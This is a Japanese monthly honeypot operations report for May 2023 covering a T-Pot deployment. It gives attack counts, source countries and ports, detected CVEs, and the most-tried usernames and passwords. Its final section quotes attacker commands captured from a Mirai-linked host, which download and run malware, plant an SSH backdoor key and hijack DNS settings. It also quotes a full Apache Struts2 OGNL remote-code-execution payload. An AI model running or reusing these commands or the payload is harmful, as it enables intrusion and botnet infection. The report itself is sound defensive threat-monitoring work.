ハニーポット運用(月次報告:2023年5月)

１．国土交通省からの情報漏洩について

2023年5月26日にg0d というユーザーがハッカーフォーラム上で国土交通省のハッキングしたとするデータを公開した。
2023年にチューリッヒおよびアフラックでの個人情報が漏洩されたことに続き、今年は大規模な情報漏洩が身近に起こっている実感がある。
Pompompurin氏の逮捕とともにハッカーフォーラムの1つが閉鎖されたが、代替サイトがまた雨後の筍のように現れるのが現実のようだ。

詳細は以下報告書に的確に纏められている。 https://jp.security.ntt/resources/cyber_security_report/adhoc_CSR_20230529.pdf

２．AWSの資格取得

多忙の業務の合間を縫って、AWS Certified Solutions Architect - Professional(SAP-C02) を取得した。
受験のきっかけは会社からの報奨金を受け取るため(貧乏なので)であるが1度落ちたので、2度目で取得できて良かった。
次回はCISSPかAWS Certified Security - Specialty(SCS-C01)のいずれかを予定。(SCS-C01は2023年7月10日にSCS-C02に切り替わるので、様子見かな。)

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2023年5月1日-2023年5月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Honeytrap	1,145,903	1(→)
2	Cowrie	361,460	2(→)
3	Dionaea	216,204	3(→)
4	Ciscoasa	107,581	4(→)
5	Mailoney	41,912	5(→)
6	Ddospot	34,526	9(↑)
7	Heralding	28,038	6(↓)
8	Adbhoney	11,468	7(↑)
9	Tanner	4,241	8(↓)
10	ConPot	2,996	11(↑)
11	Redishoneypot	2,407	10(↓)
12	CitrixHoneypot	1,279	12(→)
13	ElasticPot	747	13(→)
14	Ipphoney	170	14(→)
15	Dicompot	56	15(→)

Result
- 先月からHoneytrap(1位)～Mailoney(5位)までアクセス数の順位に変更はなかった。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Russia	554,375	1(→)
2	United States	199,299	2(→)
3	China	145,170	3(→)
4	India	96,774	9(↑)
5	Hong Kong	72,217	12(↑)
6	Netherlands	45,017	16(↑)
7	Brazil	42,391	圏外(↑)
8	United Kingdom	38,944	5(↓)
9	Bulgaria	36,825	8(↓)
10	France	36,301	4(↓)
11	Germany	35,355	6(↓)
12	Monaco	32,595	11(↓)
13	Sweden	28,026	13(→)
14	Latvia	26,882	14(→)
15	Poland	24,922	圏外(↑)
16	Vietnam	24,137	15(↓)
17	Thailand	22,084	圏外(↑)
18	Panama	20,309	17(↓)
19	Singapore	19,655	圏外(↑)
20	Japan	15,133	18(↓)

Result
- 全体のアクセス数は先月より減少傾向にあった。
- アクセス数の比率はロシア(1位)、米国(2位)・中国(3位)で変化はなかった。

上位10ヵ国のアクセスポートの分布は以下の通り

攻撃元の国名	宛先ポート	件数
Russia	445	11,848
Russia	22	1,722
Russia	6379	978
Russia	34567	508
Russia	3389	466
Russia	80	433
Russia	23	394
Russia	8080	364
Russia	9001	218
Russia	1433	198
United States	22	7,966
United States	445	5,366
United States	23	1,831
United States	25	1,790
United States	3389	1,558
United States	80	1,297
United States	6379	705
United States	161	402
United States	21	356
United States	443	296
China	22	19,711
China	445	8,938
China	23	6,240
China	25	2,201
China	8080	1,665
China	2323	1,376
China	2375	859
China	1433	805
China	2376	404
China	8888	387
India	445	82,663
India	22	2,021
India	23	702
India	1433	226
India	50100	84
India	1200	69
India	80	64
India	2323	54
India	1234	43
India	1962	41
Hong Kong	22	1,002
Hong Kong	445	358
Hong Kong	3389	334
Hong Kong	9000	124
Hong Kong	58000	116
Hong Kong	7547	109
Hong Kong	2000	105
Hong Kong	3729	105
Hong Kong	1025	92
Hong Kong	8663	92
Netherlands	22	1,944
Netherlands	23	248
Netherlands	2222	204
Netherlands	81	140
Netherlands	80	129
Netherlands	1459	93
Netherlands	1433	92
Netherlands	10243	78
Netherlands	8800	73
Netherlands	8080	70
Brazil	53	29,665
Brazil	445	6,604
Brazil	22	969
Brazil	23	265
Brazil	2323	101
Brazil	1433	38
Brazil	19	20
Brazil	80	15
Brazil	8080	14
Brazil	7001	9
United Kingdom	25	9,530
United Kingdom	22	972
United Kingdom	3389	162
United Kingdom	445	150
United Kingdom	8080	117
United Kingdom	23	104
United Kingdom	9000	93
United Kingdom	80	84
United Kingdom	6443	84
United Kingdom	4369	82
Bulgaria	5900	27,456
Bulgaria	23	676
Bulgaria	25	84
Bulgaria	5555	69
Bulgaria	22	40
Bulgaria	8088	36
Bulgaria	6379	30
Bulgaria	445	29
Bulgaria	8080	15
Bulgaria	80	14
France	22	1,974
France	445	300
France	23	161
France	2323	150
France	8000	47
France	3389	44
France	19	40
France	8080	39
France	3000	35
France	8888	32

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899,963394	963,394
2	CVE-2020-11910,42	42
3	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255,2	2

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	19,295
2	admin	4,052
3		1,907
4	user	1,574
5	ubnt	1,116
6	22	891
7	pi	888
8	test	769
9	sa	641
10	ubuntu	630
11	postgres	617
12	oracle	601
13	!root	434
14	2Wire	426
15	ansible	405
16	support	374
17	ansadmin	371
18	steam	366
19	jenkins	363
20	es	360
21	telnet	359
22	craft	343
23	Admin	332
24	zjw	331
25	moxa	330
26	orangepi	306
27	666666	279
28	blank	276
29	guest	269
30	hadoop	264
31	mysql	259
32	devops	239
33	unknown	236
34	0	232
35	uucp	228
36	adm	226
37	debug	226
38	cameras	219
39	factory	217
40	$ALOC$	214
41	zabbix	207
42	vagrant	205
43	teste	203
44	user1	184
45	minima	167
46	usr	166
47	akash	152
48	fa	148
49	default	129
50	supervisor	114

Result
- 特記事項なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	admin	2,157
2		1,976
3	123456	1,886
4	password	1,690
5	1234	1,180
6	12345	1,136
7	root	1,007
8	1	813
9	123	795
10	ubnt	747
11	12345678	660
12	blank	642
13	user	619
14	test	560
15	123456789	538
16	1qaz@WSX	494
17	Admin123	487
18	0	472
19	admin123	389
20	666666	354
21	Root1234	329
22	1111	319
23	support	317
24	Password1	302
25	Aa123456	301
26	P@ssw0rd	297
27	alpine	279
28	00000000	265
29	admin1234	250
30	hi3518	248
31	test123	239
32	Aa123456.	226
33	1234admin	225
34	_Cisco	216
35	uucp	216
36	!ishtar	213
37	10023	213
38	1q2w3e4r5t	212
39	1234567890	210
40	Root2022	210
41	backup	210
42	Password123	206
43	qweqwe	204
44	ubuntu	204
45	Admin1234	203
46	cameras	203
47	root123	202
48	synnet	200
49	Root1337	198
50	Root123	197

Result +特記事項なし

⑥今月のmasscanとZmap

massscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

今月のアクセス
- 95[.]214[.]27[.]202 から特徴的なアクセスがあった。
- No15の処理では名前解決の定義ファイルへ自身のIPアドレスを登録する処理も確認された。
- 対象のIPアドレスはIotマルウェアであるMiraiのC2サーバとして稼働しているようだ。

No	アクセス
1	cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== system key generated by server 20220709">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;
2	cat /bin/echo\|\|while read i; do echo $i; done < /proc/self/exe;
3	cat /proc/cpuinfo;
4	cat /proc/mounts
5	cd /dev; wget http[:]//95[.]214[.]27[.]202/arm4 -O- >.f; ./.f ssh.wget.arm4; >.f; echo rppr
6	cd /dev; wget http[:]//95[.]214[.]27[.]202/mips -O- >.f; ./.f ssh.wget.mips; >.f; echo rppr
7	cd /dev; wget http[:]//95[.]214[.]27[.]202/sparc -O- >.f; ./.f ssh.wget.sparc; >.f; echo rppr
8	cd /dev; wget http[:]//95[.]214[.]27[.]202/superh -O- >.f; ./.f ssh.wget.superh; >.f; echo rppr
9	cd /dev; wget http[:]//95[.]214[.]27[.]202/x86 -O- >.f; ./.f ssh.wget.x86; >.f; echo rppr
10	cd /tmp; wget http[:]//95[.]214[.]27[.]202/arm4 -O- >.f; ./.f ssh.wget.arm4; >.f; echo rppr
11	cd /tmp; wget http[:]//95[.]214[.]27[.]202/mipsel -O- >.f; ./.f ssh.wget.mipsel; >.f; echo rppr
12	cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== system key generated by server 20220709">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;
13	echo -e '\x4d\x4f\x55\x4e\x54\x53\x5f\x44\x4f\x4e\x45'
14	echo -e '\x72\x70\x70\x72/dev' > /dev/.dabag; cat /dev/.dabag; rm /dev/.dabag
15	echo 'nameserver 95.214.27.202'>/etc/resolv.conf;
16	mkdir /dev/; mount -o remount, rw /dev/; cp /bin/echo /dev/.z && >/dev/.z && cd /dev/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
17	mkdir /dev/shm/; mount -o remount, rw /dev/shm/; cp /bin/echo /dev/shm/.z && >/dev/shm/.z && cd /dev/shm/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
18	mkdir /etc/; mount -o remount, rw /etc/; cp /bin/echo /etc/.z && >/etc/.z && cd /etc/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
19	mkdir /home/$USER/; mount -o remount, rw /home/$USER/; cp /bin/echo /home/$USER/.z && >/home/$USER/.z && cd /home/$USER/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
20	mkdir /home/; mount -o remount, rw /home/; cp /bin/echo /home/.z && >/home/.z && cd /home/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
21	mkdir /mnt/; mount -o remount, rw /mnt/; cp /bin/echo /mnt/.z && >/mnt/.z && cd /mnt/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
22	mkdir /tmp/; mount -o remount, rw /tmp/; cp /bin/echo /tmp/.z && >/tmp/.z && cd /tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
23	mkdir /var/; mount -o remount, rw /var/; cp /bin/echo /var/.z && >/var/.z && cd /var/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
24	mkdir /var/tmp/; mount -o remount, rw /var/tmp/; cp /bin/echo /var/tmp/.z && >/var/tmp/.z && cd /var/tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d;
25	rm -f /dev/.d; rm -f /dev/.f; >/dev/.d; (chmod 777 /dev/.d \|\| cp /bin/echo /dev/.d; >/dev/.d); cp /dev/.d /dev/.f
26	wget \|\| busybox wget \|\| wd1; curl \|\| busybox curl \|\| cd1; echo -e '\x67\x61\x79\x66\x67\x74';
27	wget --help>/dev/null&&echo -en '\x57\x47\x45\x54';curl --help>/dev/null&&echo -en '\x43\x55\x52\x4c'; echo -en '\x67\x61\x79\x66\x67\x74'
28	wget http[:]//95[.]214[.]27[.]202/arc -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/arc -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/arc -O-> .i; ./.i ssh.wget.arc; >.i;
29	wget http[:]//95[.]214[.]27[.]202/arm4 -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/arm4 -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/arm4 -O-> .i; ./.i ssh.wget.arm4; >.i;
30	wget http[:]//95[.]214[.]27[.]202/m68k -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/m68k -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/m68k -O-> .i; ./.i ssh.wget.m68k; >.i;
31	wget http[:]//95[.]214[.]27[.]202/mips -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/mips -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/mips -O-> .i; ./.i ssh.wget.mips; >.i;
32	wget http[:]//95[.]214[.]27[.]202/mipsel -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/mipsel -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/mipsel -O-> .i; ./.i ssh.wget.mipsel; >.i;
33	wget http[:]//95[.]214[.]27[.]202/powerpc -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/powerpc -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/powerpc -O-> .i; ./.i ssh.wget.powerpc; >.i;
34	wget http[:]//95[.]214[.]27[.]202/sparc -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/sparc -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/sparc -O-> .i; ./.i ssh.wget.sparc; >.i;
35	wget http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i \|\| busybox wget http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i \|\| wd1 http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i; ./.i ssh.wget.x86_64; >.i;

　
+ Apache Struts2 の任意のコードが実行可能な脆弱性(CVE-2017-5638) も観測された。　

No	項目名	値
1	country_name:	United States
2	url:	/
3	http_method:	POST
4	dest_ip:	xxx.xxx.xxx.xxx
5	dest_port:	8080
6	src_ip:	38[.]55[.]129[.]37
7	src_port:	49350
8	input:	"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 23492384y97923487').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"